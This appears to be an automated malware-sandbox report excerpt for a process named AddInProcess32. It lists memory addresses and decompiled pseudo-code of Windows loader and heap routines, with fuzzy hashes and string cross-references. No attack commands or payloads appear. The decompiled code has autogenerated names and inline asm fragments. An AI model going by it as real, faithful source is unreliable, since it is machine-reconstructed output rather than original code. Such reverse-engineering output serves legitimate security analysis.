                              0x0192ebc3
                              0x0192ebc5
                              0x0192ebcb
                              0x0192ebd2
                              0x0192ebd5
                              0x0192ebdb
                              0x0192ebdf
                              0x0192ebe1
                              0x0192ebf0
                              0x0192ebf9
                              0x0192ec04
                              0x0192ec07
                              0x0192ec0a
                              0x0192ec82
                              0x0192ec85
                              0x0192ec8b
                              0x0192ec91
                              0x0192ec93
                              0x0192ec96
                              0x0192ec9b
                              0x0192eca6
                              0x0192ecac
                              0x0192ecae
                              0x0192ecae
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0192ec0c
                              0x0192ec0c
                              0x0192ec0c
                              0x0192ec0f
                              0x0192ec12
                              0x0192ec15
                              0x0192ec15
                              0x0192ec18
                              0x0192ec1e
                              0x00000000
                              0x00000000
                              0x0192ec22
                              0x0192ec28
                              0x0192ec4b
                              0x0192ec5b
                              0x0192ec5d
                              0x0192ec63
                              0x0192ec65
                              0x0192ec68
                              0x0192ec6b
                              0x0192ec6b
                              0x0192ec70
                              0x0192ec71
                              0x0192ec74
                              0x0192ec7d
                              0x00000000
                              0x0192ebe3
                              0x0192ebe3
                              0x0192ebe6
                              0x0192ebe6
                              0x0192ebe7
                              0x0192ebe9
                              0x0192ebec
                              0x00000000
                              0x0192ebe6
                              0x0192ebe1
                              0x0192eba4
                              0x0192eba9
                              0x0192ebb0
                              0x0192ebb3
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0192ebab
                              0x0192ebab
                              0x0192ebab
                              0x0192ebac
                              0x0192ebac
                              0x00000000
                              0x0192ebab
                              0x0192eb97
                              0x0192eb19
                              0x0192eb1c
                              0x0192eb21
                              0x0192eb26
                              0x0192eb2c
                              0x0192eb2c
                              0x00000000
                              0x0192eb26
                              0x0192ead6
                              0x0192ead9
                              0x0192eadc
                              0x0192eadc
                              0x0192eadc
                              0x0192eade
                              0x0192eae4
                              0x00000000
                              0x00000000
                              0x0192eaee
                              0x0192eaf7
                              0x0192eaf9
                              0x00000000
                              0x00000000
                              0x0192eb04
                              0x0192eb12
                              0x00000000
                              0x0192eb12
                              0x0192eb06
                              0x00000000
                              0x0192eb06
                              0x0192eaf0
                              0x0192eaf2
                              0x0192eaf4
                              0x00000000
                              0x0192eaf4
                              0x0192ea6a
                              0x0192ea21
                              0x00000000
                              0x0192ea21
                              0x0192e9d6
                              0x0192e9d6
                              0x0192e9e0
                              0x0192e9e2
                              0x0192e9e2
                              0x0192e9e8
                              0x00000000
                              0x0192e9e8
                              0x0192e987
                              0x0192e98f
                              0x0192e992
                              0x0192e995
                              0x0192e995
                              0x0192e998
                              0x0192e998
                              0x0192e99a
                              0x0192e9a0
                              0x00000000
                              0x00000000
                              0x0192e9a9
                              0x0192e9b2
                              0x0192e9b4
                              0x00000000
                              0x00000000
                              0x0192e9ba
                              0x0192e9c1
                              0x0192e9cf
                              0x00000000
                              0x0192e9cf
                              0x0192e9c3
                              0x00000000
                              0x0192e9c3
                              0x0192e9ab
                              0x0192e9ad
                              0x0192e9af
                              0x00000000
                              0x0192e9af
                              0x0192e924
                              0x0192e8b7
                              0x0192e8ba
                              0x0192e902
                              0x0192e908
                              0x0192e90a
                              0x00000000
                              0x0192e90a
                              0x0192e8bc
                              0x0192e8bf
                              0x0192e8f9
                              0x0192e8ff
                              0x0192e901
                              0x00000000
                              0x0192e901
                              0x0192e8c1
                              0x0192e8c4
                              0x0192e8f0
                              0x0192e8f6
                              0x0192e8f8
                              0x00000000
                              0x0192e8f8
                              0x0192e8c6
                              0x0192e8c9
                              0x0192e8e7
                              0x0192e8ed
                              0x0192e8ef
                              0x00000000
                              0x0192e8ef
                              0x0192e8cb
                              0x0192e8ce
                              0x0192e8de
                              0x0192e8e4
                              0x0192e8e6
                              0x00000000
                              0x0192e8e6
                              0x0192e8d3
                              0x00000000
                              0x0192e8d5
                              0x0192e8db
                              0x0192e8dd
                              0x00000000
                              0x0192e8dd
                              0x0192e853
                              0x0192e855
                              0x0192e85b
                              0x0192e85d
                              0x0192e897
                              0x0192e89c
                              0x0192e8a2
                              0x0192e8a6
                              0x0192e8ab
                              0x0192e8ad
                              0x0192e8ad
                              0x00000000
                              0x0192e85d

                              APIs
                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID: DebugPrintTimes
                              • String ID:
                              • API String ID: 3446177414-0
                              • Opcode ID: c3e059ec2202891d7b4ac61a58a814e12e469cba1d4f428aecc895fef02feca1
                              • Instruction ID: c28866c78c3b14411098287e95e7b300a6994a5020281484f62dc4a3996a43ef
                              • Opcode Fuzzy Hash: c3e059ec2202891d7b4ac61a58a814e12e469cba1d4f428aecc895fef02feca1
                              • Instruction Fuzzy Hash: 5702B272F006268BCB18CFADC8D167EFBF6AF88201B19856DD45ADB385D634E901CB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 29%
                              			E018540E1(void* __edx) {
                              				void* _t19;
                              				void* _t29;
                              
                              				_t28 = _t19;
                              				_t29 = __edx;
                              				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
                              					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                              						_push("HEAP: ");
                              						E0185B150();
                              					} else {
                              						E0185B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                              					}
                              					E0185B150("Invalid heap signature for heap at %p", _t28);
                              					if(_t29 != 0) {
                              						E0185B150(", passed to %s", _t29);
                              					}
                              					_push("\n");
                              					E0185B150();
                              					if( *((char*)( *[fs:0x30] + 2)) != 0) {
                              						 *0x1946378 = 1;
                              						asm("int3");
                              						 *0x1946378 = 0;
                              					}
                              					return 0;
                              				}
                              				return 1;
                              			}






                              Strings
                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
                              • API String ID: 0-188067316
                              • Opcode ID: 07557af578fb1d11dbdd9e418a66f9e8c1989050a2aed20e23c10de806973b5e
                              • Instruction ID: 1fdc5106d42faf1f92a7add07fd925072c5baedac27b460f9b0eb2c3adb8eb69
                              • Opcode Fuzzy Hash: 07557af578fb1d11dbdd9e418a66f9e8c1989050a2aed20e23c10de806973b5e
                              • Instruction Fuzzy Hash: 68014932144581AFD369576D94CDF9277B4DB51B35F288029F404CB7819AAC5740C961
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                              • API String ID: 2994545307-336120773
                              • Opcode ID: eb5683a4401aa8a3c32ae5a2d3339f133f2db35b0a6d7e4646abe32f1eb7ebdc
                              • Instruction ID: 4be1f4056d6b74d78962e7e0eee5afe9a5f75d712fd162616d4068aa789a24da
                              • Opcode Fuzzy Hash: eb5683a4401aa8a3c32ae5a2d3339f133f2db35b0a6d7e4646abe32f1eb7ebdc
                              • Instruction Fuzzy Hash: 89314A32200509EFD751DB9DC888F6777E9EF08B21F194469F509DB284E770EA80CB55
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 83%
                              			E01868794(void* __ecx) {
                              				signed int _v0;
                              				char _v8;
                              				signed int _v12;
                              				void* _v16;
                              				signed int _v20;
                              				intOrPtr _v24;
                              				signed int _v28;
                              				signed int _v32;
                              				signed int _v40;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				void* __ebp;
                              				intOrPtr* _t77;
                              				signed int _t80;
                              				signed char _t81;
                              				signed int _t87;
                              				signed int _t91;
                              				void* _t92;
                              				void* _t94;
                              				signed int _t95;
                              				signed int _t103;
                              				signed int _t105;
                              				signed int _t110;
                              				signed int _t118;
                              				intOrPtr* _t121;
                              				intOrPtr _t122;
                              				signed int _t125;
                              				signed int _t129;
                              				signed int _t131;
                              				signed int _t134;
                              				signed int _t136;
                              				signed int _t143;
                              				signed int* _t147;
                              				signed int _t151;
                              				void* _t153;
                              				signed int* _t157;
                              				signed int _t159;
                              				signed int _t161;
                              				signed int _t166;
                              				signed int _t168;
                              
                              				_push(__ecx);
                              				_t153 = __ecx;
                              				_t159 = 0;
                              				_t121 = __ecx + 0x3c;
                              				if( *_t121 == 0) {
                              					L2:
                              					_t77 =  *((intOrPtr*)(_t153 + 0x58));
                              					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
                              						_t122 =  *((intOrPtr*)(_t153 + 0x20));
                              						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
                              						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
                              							L6:
                              							if(E0186934A() != 0) {
                              								_t159 = E018DA9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
                              								__eflags = _t159;
                              								if(_t159 < 0) {
                              									_t81 =  *0x1945780; // 0x0
                              									__eflags = _t81 & 0x00000003;
                              									if((_t81 & 0x00000003) != 0) {
                              										_push(_t159);
                              										E018D5510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
                              										_t81 =  *0x1945780; // 0x0
                              									}
                              									__eflags = _t81 & 0x00000010;
                              									if((_t81 & 0x00000010) != 0) {
                              										asm("int3");
                              									}
                              								}
                              							}
                              						} else {
                              							_t159 = E0186849B(0, _t122, _t153, _t159, _t180);
                              							if(_t159 >= 0) {
                              								goto L6;
                              							}
                              						}
                              						_t80 = _t159;
                              						goto L8;
                              					} else {
                              						_t125 = 0x13;
                              						asm("int 0x29");
                              						_push(0);
                              						_push(_t159);
                              						_t161 = _t125;
                              						_t87 =  *( *[fs:0x30] + 0x1e8);
                              						_t143 = 0;
                              						_v40 = _t161;
                              						_t118 = 0;
                              						_push(_t153);
                              						__eflags = _t87;
                              						if(_t87 != 0) {
                              							_t118 = _t87 + 0x5d8;
                              							__eflags = _t118;
                              							if(_t118 == 0) {
                              								L46:
                              								_t118 = 0;
                              							} else {
                              								__eflags =  *(_t118 + 0x30);
                              								if( *(_t118 + 0x30) == 0) {
                              									goto L46;
                              								}
                              							}
                              						}
                              						_v32 = 0;
                              						_v28 = 0;
                              						_v16 = 0;
                              						_v20 = 0;
                              						_v12 = 0;
                              						__eflags = _t118;
                              						if(_t118 != 0) {
                              							__eflags = _t161;
                              							if(_t161 != 0) {
                              								__eflags =  *(_t118 + 8);
                              								if( *(_t118 + 8) == 0) {
                              									L22:
                              									_t143 = 1;
                              									__eflags = 1;
                              								} else {
                              									_t19 = _t118 + 0x40; // 0x40
                              									_t156 = _t19;
                              									E01868999(_t19,  &_v16);
                              									__eflags = _v0;
                              									if(_v0 != 0) {
                              										__eflags = _v0 - 1;
                              										if(_v0 != 1) {
                              											goto L22;
                              										} else {
                              											_t128 =  *(_t161 + 0x64);
                              											__eflags =  *(_t161 + 0x64);
                              											if( *(_t161 + 0x64) == 0) {
                              												goto L22;
                              											} else {
                              												E01868999(_t128,  &_v12);
                              												_t147 = _v12;
                              												_t91 = 0;
                              												__eflags = 0;
                              												_t129 =  *_t147;
                              												while(1) {
                              													__eflags =  *((intOrPtr*)(0x1945c60 + _t91 * 8)) - _t129;
                              													if( *((intOrPtr*)(0x1945c60 + _t91 * 8)) == _t129) {
                              														break;
                              													}
                              													_t91 = _t91 + 1;
                              													__eflags = _t91 - 5;
                              													if(_t91 < 5) {
                              														continue;
                              													} else {
                              														_t131 = 0;
                              														__eflags = 0;
                              													}
                              													L37:
                              													__eflags = _t131;
                              													if(_t131 != 0) {
                              														goto L22;
                              													} else {
                              														__eflags = _v16 - _t147;
                              														if(_v16 != _t147) {
                              															goto L22;
                              														} else {
                              															E01872280(_t92, 0x19486cc);
                              															_t94 = E01929DFB( &_v20);
                              															__eflags = _t94 - 1;
                              															if(_t94 != 1) {
                              															}
                              															asm("movsd");
                              															asm("movsd");
                              															asm("movsd");
                              															asm("movsd");
                              															 *_t118 =  *_t118 + 1;
                              															asm("adc dword [ebx+0x4], 0x0");
                              															_t95 = E018861A0( &_v32);
                              															__eflags = _t95;
                              															if(_t95 != 0) {
                              																__eflags = _v32 | _v28;
                              																if((_v32 | _v28) != 0) {
                              																	_t71 = _t118 + 0x40; // 0x3f
                              																	_t134 = _t71;
                              																	goto L55;
                              																}
                              															}
                              															goto L30;
                              														}
                              													}
                              													goto L56;
                              												}
                              												_t92 = 0x1945c64 + _t91 * 8;
                              												asm("lock xadd [eax], ecx");
                              												_t131 = (_t129 | 0xffffffff) - 1;
                              												goto L37;
                              											}
                              										}
                              										goto L56;
                              									} else {
                              										_t143 = E01868A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
                              										__eflags = _t143;
                              										if(_t143 != 0) {
                              											_t157 = _v12;
                              											_t103 = 0;
                              											__eflags = 0;
                              											_t136 =  &(_t157[1]);
                              											 *(_t161 + 0x64) = _t136;
                              											_t151 =  *_t157;
                              											_v20 = _t136;
                              											while(1) {
                              												__eflags =  *((intOrPtr*)(0x1945c60 + _t103 * 8)) - _t151;
                              												if( *((intOrPtr*)(0x1945c60 + _t103 * 8)) == _t151) {
                              													break;
                              												}
                              												_t103 = _t103 + 1;
                              												__eflags = _t103 - 5;
                              												if(_t103 < 5) {
                              													continue;
                              												}
                              												L21:
                              												_t105 = E0189F380(_t136, 0x1831184, 0x10);
                              												__eflags = _t105;
                              												if(_t105 != 0) {
                              													__eflags =  *_t157 -  *_v16;
                              													if( *_t157 >=  *_v16) {
                              														goto L22;
                              													} else {
                              														asm("cdq");
                              														_t166 = _t157[5] & 0x0000ffff;
                              														_t108 = _t157[5] & 0x0000ffff;
                              														asm("cdq");
                              														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
                              														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
                              														if(__eflags > 0) {
                              															L29:
                              															E01872280(_t108, 0x19486cc);
                              															 *_t118 =  *_t118 + 1;
                              															_t42 = _t118 + 0x40; // 0x3f
                              															_t156 = _t42;
                              															asm("adc dword [ebx+0x4], 0x0");
                              															asm("movsd");
                              															asm("movsd");
                              															asm("movsd");
                              															asm("movsd");
                              															_t110 = E018861A0( &_v32);
                              															__eflags = _t110;
                              															if(_t110 != 0) {
                              																__eflags = _v32 | _v28;
                              																if((_v32 | _v28) != 0) {
                              																	_t134 = _v20;
                              																	L55:
                              																	E01929D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
                              																}
                              															}
                              															L30:
                              															 *_t118 =  *_t118 + 1;
                              															asm("adc dword [ebx+0x4], 0x0");
                              															E0186FFB0(_t118, _t156, 0x19486cc);
                              															goto L22;
                              														} else {
                              															if(__eflags < 0) {
                              																goto L22;
                              															} else {
                              																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
                              																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
                              																	goto L22;
                              																} else {
                              																	goto L29;
                              																}
                              															}
                              														}
                              													}
                              													goto L56;
                              												}
                              												goto L22;
                              											}
                              											asm("lock inc dword [eax]");
                              											goto L21;
                              										}
                              									}
                              								}
                              							}
                              						}
                              						return _t143;
                              					}
                              				} else {
                              					_push( &_v8);
                              					_push( *((intOrPtr*)(__ecx + 0x50)));
                              					_push(__ecx + 0x40);
                              					_push(_t121);
                              					_push(0xffffffff);
                              					_t80 = E01899A00();
                              					_t159 = _t80;
                              					if(_t159 < 0) {
                              						L8:
                              						return _t80;
                              					} else {
                              						goto L2;
                              					}
                              				}
                              				L56:
                              			}

                              Strings
                              • minkernel\ntdll\ldrsnap.c, xrefs: 018B9C28
                              • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 018B9C18
                              • LdrpDoPostSnapWork, xrefs: 018B9C1E
                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                              • API String ID: 2994545307-1948996284
                              • Opcode ID: 9fc9d1321af9fa12ec487c8ae2eb2592e9d77f7c3c48f821cca36f37f60abb9f
                              • Instruction ID: d825c5712a97547b92a7ffe27c3da0dd86f2d2282ad16b514f24cbfe52b450b3
                              • Opcode Fuzzy Hash: 9fc9d1321af9fa12ec487c8ae2eb2592e9d77f7c3c48f821cca36f37f60abb9f
                              • Instruction Fuzzy Hash: 1391E171A0031A9FEF28DF5DD4C1AAAB7B9FF86314B154169DA09EB241D730EB01CB91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 98%
                              			E01867E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                              				char _v8;
                              				intOrPtr _v12;
                              				intOrPtr _v16;
                              				intOrPtr _v20;
                              				char _v24;
                              				signed int _t73;
                              				void* _t77;
                              				char* _t82;
                              				char* _t87;
                              				signed char* _t97;
                              				signed char _t102;
                              				intOrPtr _t107;
                              				signed char* _t108;
                              				intOrPtr _t112;
                              				intOrPtr _t124;
                              				intOrPtr _t125;
                              				intOrPtr _t126;
                              
                              				_t107 = __edx;
                              				_v12 = __ecx;
                              				_t125 =  *((intOrPtr*)(__ecx + 0x20));
                              				_t124 = 0;
                              				_v20 = __edx;
                              				if(E0186CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
                              					_t112 = _v8;
                              				} else {
                              					_t112 = 0;
                              					_v8 = 0;
                              				}
                              				if(_t112 != 0) {
                              					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
                              						_t124 = 0xc000007b;
                              						goto L8;
                              					}
                              					_t73 =  *(_t125 + 0x34) | 0x00400000;
                              					 *(_t125 + 0x34) = _t73;
                              					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
                              						goto L3;
                              					}
                              					 *(_t125 + 0x34) = _t73 | 0x01000000;
                              					_t124 = E0185C9A4( *((intOrPtr*)(_t125 + 0x18)));
                              					if(_t124 < 0) {
                              						goto L8;
                              					} else {
                              						goto L3;
                              					}
                              				} else {
                              					L3:
                              					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
                              						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
                              						L8:
                              						return _t124;
                              					}
                              					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
                              						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
                              							goto L5;
                              						}
                              						_t102 =  *0x1945780; // 0x0
                              						if((_t102 & 0x00000003) != 0) {
                              							E018D5510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
                              							_t102 =  *0x1945780; // 0x0
                              						}
                              						if((_t102 & 0x00000010) != 0) {
                              							asm("int3");
                              						}
                              						_t124 = 0xc0000428;
                              						goto L8;
                              					}
                              					L5:
                              					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
                              						goto L8;
                              					}
                              					_t77 = _a4 - 0x40000003;
                              					if(_t77 == 0 || _t77 == 0x33) {
                              						_v16 =  *((intOrPtr*)(_t125 + 0x18));
                              						if(E01877D50() != 0) {
                              							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                              						} else {
                              							_t82 = 0x7ffe0384;
                              						}
                              						_t108 = 0x7ffe0385;
                              						if( *_t82 != 0) {
                              							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                              								if(E01877D50() == 0) {
                              									_t97 = 0x7ffe0385;
                              								} else {
                              									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                              								}
                              								if(( *_t97 & 0x00000020) != 0) {
                              									E018D7016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
                              								}
                              							}
                              						}
                              						if(_a4 != 0x40000003) {
                              							L14:
                              							_t126 =  *((intOrPtr*)(_t125 + 0x18));
                              							if(E01877D50() != 0) {
                              								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                              							} else {
                              								_t87 = 0x7ffe0384;
                              							}
                              							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                              								if(E01877D50() != 0) {
                              									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                              								}
                              								if(( *_t108 & 0x00000020) != 0) {
                              									E018D7016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
                              								}
                              							}
                              							goto L8;
                              						} else {
                              							_v16 = _t125 + 0x24;
                              							_t124 = E0188A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
                              							if(_t124 < 0) {
                              								E0185B1E1(_t124, 0x1490, 0, _v16);
                              								goto L8;
                              							}
                              							goto L14;
                              						}
                              					} else {
                              						goto L8;
                              					}
                              				}
                              			}

                              Strings
                              • LdrpCompleteMapModule, xrefs: 018B9898
                              • minkernel\ntdll\ldrmap.c, xrefs: 018B98A2
                              • Could not validate the crypto signature for DLL %wZ, xrefs: 018B9891
                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                              • API String ID: 0-1676968949
                              • Opcode ID: ddc88061dd6c077ab74138e5d9ba6ad6b7ce9543869a6df9c469f2c510fed3f8
                              • Instruction ID: ce378370fa2a4bc56e8fa312be9420896be72d6cc8dc8787f836a91fe6b34e8e
                              • Opcode Fuzzy Hash: ddc88061dd6c077ab74138e5d9ba6ad6b7ce9543869a6df9c469f2c510fed3f8
                              • Instruction Fuzzy Hash: 4A51E171A04746DBE722CB6CCD84B6A7BA8AB00B1CF0405A9EA51DB3D1D734EF04C791
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 93%
                              			E0185E620(void* __ecx, short* __edx, short* _a4) {
                              				char _v16;
                              				char _v20;
                              				intOrPtr _v24;
                              				char* _v28;
                              				char _v32;
                              				char _v36;
                              				char _v44;
                              				signed int _v48;
                              				intOrPtr _v52;
                              				void* _v56;
                              				void* _v60;
                              				char _v64;
                              				void* _v68;
                              				void* _v76;
                              				void* _v84;
                              				signed int _t59;
                              				signed int _t74;
                              				signed short* _t75;
                              				signed int _t76;
                              				signed short* _t78;
                              				signed int _t83;
                              				short* _t93;
                              				signed short* _t94;
                              				short* _t96;
                              				void* _t97;
                              				signed int _t99;
                              				void* _t101;
                              				void* _t102;
                              
                              				_t80 = __ecx;
                              				_t101 = (_t99 & 0xfffffff8) - 0x34;
                              				_t96 = __edx;
                              				_v44 = __edx;
                              				_t78 = 0;
                              				_v56 = 0;
                              				if(__ecx == 0 || __edx == 0) {
                              					L28:
                              					_t97 = 0xc000000d;
                              				} else {
                              					_t93 = _a4;
                              					if(_t93 == 0) {
                              						goto L28;
                              					}
                              					_t78 = E0185F358(__ecx, 0xac);
                              					if(_t78 == 0) {
                              						_t97 = 0xc0000017;
                              						L6:
                              						if(_v56 != 0) {
                              							_push(_v56);
                              							E018995D0();
                              						}
                              						if(_t78 != 0) {
                              							L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
                              						}
                              						return _t97;
                              					}
                              					E0189FA60(_t78, 0, 0x158);
                              					_v48 = _v48 & 0x00000000;
                              					_t102 = _t101 + 0xc;
                              					 *_t96 = 0;
                              					 *_t93 = 0;
                              					E0189BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
                              					_v36 = 0x18;
                              					_v28 =  &_v44;
                              					_v64 = 0;
                              					_push( &_v36);
                              					_push(0x20019);
                              					_v32 = 0;
                              					_push( &_v64);
                              					_v24 = 0x40;
                              					_v20 = 0;
                              					_v16 = 0;
                              					_t97 = E01899600();
                              					if(_t97 < 0) {
                              						goto L6;
                              					}
                              					E0189BB40(0,  &_v36, L"InstallLanguageFallback");
                              					_push(0);
                              					_v48 = 4;
                              					_t97 = L0185F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
                              					if(_t97 >= 0) {
                              						if(_v52 != 1) {
                              							L17:
                              							_t97 = 0xc0000001;
                              							goto L6;
                              						}
                              						_t59 =  *_t78 & 0x0000ffff;
                              						_t94 = _t78;
                              						_t83 = _t59;
                              						if(_t59 == 0) {
                              							L19:
                              							if(_t83 == 0) {
                              								L23:
                              								E0189BB40(_t83, _t102 + 0x24, _t78);
                              								if(L018643C0( &_v48,  &_v64) == 0) {
                              									goto L17;
                              								}
                              								_t84 = _v48;
                              								 *_v48 = _v56;
                              								if( *_t94 != 0) {
                              									E0189BB40(_t84, _t102 + 0x24, _t94);
                              									if(L018643C0( &_v48,  &_v64) != 0) {
                              										 *_a4 = _v56;
                              									} else {
                              										_t97 = 0xc0000001;
                              										 *_v48 = 0;
                              									}
                              								}
                              								goto L6;
                              							}
                              							_t83 = _t83 & 0x0000ffff;
                              							while(_t83 == 0x20) {
                              								_t94 =  &(_t94[1]);
                              								_t74 =  *_t94 & 0x0000ffff;
                              								_t83 = _t74;
                              								if(_t74 != 0) {
                              									continue;
                              								}
                              								goto L23;
                              							}
                              							goto L23;
                              						} else {
                              							goto L14;
                              						}
                              						while(1) {
                              							L14:
                              							_t27 =  &(_t94[1]); // 0x2
                              							_t75 = _t27;
                              							if(_t83 == 0x2c) {
                              								break;
                              							}
                              							_t94 = _t75;
                              							_t76 =  *_t94 & 0x0000ffff;
                              							_t83 = _t76;
                              							if(_t76 != 0) {
                              								continue;
                              							}
                              							goto L23;
                              						}
                              						 *_t94 = 0;
                              						_t94 = _t75;
                              						_t83 =  *_t75 & 0x0000ffff;
                              						goto L19;
                              					}
                              				}
                              			}
































                              Strings
                              • @, xrefs: 0185E6C0
                              • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0185E68C
                              • InstallLanguageFallback, xrefs: 0185E6DB
                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                              • API String ID: 0-1757540487
                              • Opcode ID: 6a53c322fcd6c412abe15dcbf430cc8270dc04fff5dc11bbedfbceb51a48a9ab
                              • Instruction ID: 574d6e985e5c0fcc3e74d30d28bd3583d535941755f25237b8cb3da4a885f474
                              • Opcode Fuzzy Hash: 6a53c322fcd6c412abe15dcbf430cc8270dc04fff5dc11bbedfbceb51a48a9ab
                              • Instruction Fuzzy Hash: D7516FB25043469BDB15DF68C880AABB7E8EF88755F05092EF985D7250E734DB04C7A2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Strings
